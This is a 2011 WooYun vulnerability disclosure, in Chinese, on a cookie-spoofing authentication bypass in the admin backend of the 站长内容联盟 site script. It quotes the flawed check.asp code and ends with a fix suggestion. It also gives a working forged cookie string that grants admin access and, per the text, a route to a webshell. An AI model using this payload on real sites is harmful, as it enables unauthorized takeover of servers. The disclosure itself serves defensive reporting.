当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01919

漏洞标题:站长内容联盟后台Cookie欺骗漏洞

相关厂商:站长内容联盟

漏洞作者: yeweit6

提交时间:2011-04-17 15:56

修复时间:2011-04-17 16:00

公开时间:2011-04-17 16:00

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。

详细说明:

验证文件 check.asp中的漏洞代码如下:

dim CheckAdmin,CheckAdminAll,Administer,tempAdmin,tadmin,Flag,Purview,AdminName
if md5(request.cookies("rand")&request.cookies("AdminName")&request.cookies("adminid"))<>request.cookies("check") then
errmsg=errmsg+ "<BR>"+"<li>没有权限或登录超时,请按确定返回重新登录."
call Error_Msg(Errmsg)
response.end
end if


cookie欺骗的漏洞很明显,只要rand+AdminName+adminid的md5密文与check匹配即可。

漏洞证明:

改cookie为check=802e5e662c4ebe86c497b15afe0b58fd; rand=1; AdminName=admin; adminid=1,其中802e5e662c4ebe86c497b15afe0b58fd=MD5(1admin1),即可进入后台。

修复方案:

这样的系统建议用session验证,或者cookie验证时加上从数据库中读取的password。

版权声明:转载请注明来源 yeweit6@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)


漏洞评价:

评论